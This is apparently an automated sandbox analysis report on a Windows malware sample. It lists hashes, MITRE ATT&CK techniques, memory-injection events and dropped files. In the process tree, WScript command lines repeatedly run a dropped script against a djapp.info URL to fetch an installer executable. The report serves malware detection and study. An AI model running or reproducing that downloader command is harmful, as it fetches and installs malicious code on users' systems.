a51d541409fb3114bc3df592245ccf39a88e2dc7f4bcc3bbd1322c07c5004c04

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19/09/2024, 04:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe
Size

184KB
MD5

ea8f7bcd5c0e42402fd33b910839ad3f
SHA1

0723f2ee89d779d5975a75c028a8b62c7dcee102
SHA256

a51d541409fb3114bc3df592245ccf39a88e2dc7f4bcc3bbd1322c07c5004c04
SHA512

7e64b6bfa96ee221d2da1023b26039f13d963aeb60831ba141d814bab1e4810dee56386a3080bba2549915051eb378e8a3d40cc9c91147585a50e72f4ceaca3a
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO35i:/7BSH8zUB+nGESaaRvoB7FJNndnR

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2192	WScript.exe
8	2192	WScript.exe
10	2192	WScript.exe
12	2228	WScript.exe
13	2228	WScript.exe
15	2580	WScript.exe
16	2580	WScript.exe
18	828	WScript.exe
19	828	WScript.exe
21	1836	WScript.exe
22	1836	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2192	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	30
PID 2532 wrote to memory of 2192	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	30
PID 2532 wrote to memory of 2192	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	30
PID 2532 wrote to memory of 2192	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	30
PID 2532 wrote to memory of 2228	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	33
PID 2532 wrote to memory of 2228	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	33
PID 2532 wrote to memory of 2228	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	33
PID 2532 wrote to memory of 2228	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	33
PID 2532 wrote to memory of 2580	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	35
PID 2532 wrote to memory of 2580	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	35
PID 2532 wrote to memory of 2580	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	35
PID 2532 wrote to memory of 2580	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	35
PID 2532 wrote to memory of 828	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	37
PID 2532 wrote to memory of 828	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	37
PID 2532 wrote to memory of 828	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	37
PID 2532 wrote to memory of 828	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	37
PID 2532 wrote to memory of 1836	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	39
PID 2532 wrote to memory of 1836	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	39
PID 2532 wrote to memory of 1836	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	39
PID 2532 wrote to memory of 1836	2532	ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ea8f7bcd5c0e42402fd33b910839ad3f_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7CB.js" http://www.djapp.info/?domain=rvkWRqHXpI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB7CB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2192
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7CB.js" http://www.djapp.info/?domain=rvkWRqHXpI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB7CB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2228
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7CB.js" http://www.djapp.info/?domain=rvkWRqHXpI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB7CB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2580
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7CB.js" http://www.djapp.info/?domain=rvkWRqHXpI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB7CB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:828
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB7CB.js" http://www.djapp.info/?domain=rvkWRqHXpI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB7CB.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
8846cee5fa2c4acf0bc4c2ce547a0161

SHA1
94c339943e6b2af49f4437b307403366196cff0c

SHA256
146f246cbf0ec2dc405a5b9a2bf82389ade089d4382474d7caf34e15207a1b5d

SHA512
b502e8285912011936bf83d492a9eaed8931e99241910d265edff5b1de264015bf7d019fcfdfff0fa3e569a6f4c5edd474b14c090d1086f9c1799165bdb7ee41

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
b625841164ec8c4cf99725d4fe2fc5f0

SHA1
0f3b209e2b3419c67ac1fcfa44ae79a7f7712f5a

SHA256
a589ab882640bbfcba4f74e022153cad8da8a356ce78df80b495d0e2a85ce1c5

SHA512
2a7d9c00043c8b71c713480ae508930485d8000e0b96132b72afbbfa2c767cf5e65efcec3c5bf3a9ea235717ef8ae27a38c34f2cc062b26b4b3d653c22c31da7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
30cd5bee4231d9d4cec50be9ab9eed41

SHA1
9be94c72a83b46694cbc4a51a63f8bf503f85ac5

SHA256
1025998b74662474723d0dbe2927aaf9a80072b43f5a19bc268c589cd64ca658

SHA512
44ec7d92c557329222b83e7a046899701f3e41fb500c49793e0d5d5481e8b068a4223ba4ee0204f71b640e92ac641b82196a77e156abcbddcef74472f1252abe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
6ea7ed3366aef75a8e25bd7ec62ae309

SHA1
07de0f6911f655d03a0e8f35563217dee03f71f1

SHA256
8c18b93da21cb90dd2fad538257f7822155e932a38b1c6616d584edfec83128c

SHA512
e99546a8853e16fca853802499694e6d0925fb6b06fb49e92fd382faf4cd3619b6085b9d6d1288d0ef410de74963697d0b661269bff68c8c8603c6b27a4a6522

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
40KB

MD5
b256db3dc7d8698c0c0438fd3e53ae89

SHA1
a5b8e663f91d9ed72e69bb34275d2991dfebe71c

SHA256
44fbbc887d52f4c582181d1beb568f6975a6341dcee9081c16ef1403020f7a70

SHA512
35b9a8ee9368c14d3dca2fec289d69b1b496f758d6f1de64b7c8891d0d73913ff0f7220d590f15d5d782e7bb43d012882465ebc2e41710be54a8ac972b69b098

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
6KB

MD5
9f69748a7e4785fd4bdee8ef9b984993

SHA1
e7803e6d11c82b7d5e4360856e6e59953515469b

SHA256
4421436082a9680f4340e3d52a65b25b78ae4477693e2fcc7326a44c003da77b

SHA512
c6fe59558324f02981f7da9cbc2d97de7f12cde81fecf80775aefbaea1fb6ebe61fb4f364dd96c61cead1f9ec3a50f062f47f0b3313fe3e2f59fa71a4b78066d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabFF65.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar17C6.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufB7CB.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\48J2D7QD.txt

Filesize
177B

MD5
6c9ec943c4e1d9ddb9a356561db73f98

SHA1
d93ba61c96edf0b626d0d796a0bafe4e558c21db

SHA256
ddbabd5e16f5fa14ee12f8356c1bbd347f6c673d79cee5b2078d2e78514569da

SHA512
4dc23ca667db581d1c6418d66aa18af13a25cce8cc9688e32fe38dd8506c63bdb07e496455d1547110b40c583eab4849cd707e9ae4e1d0b71c1e6fe47c4a2992

Download Submit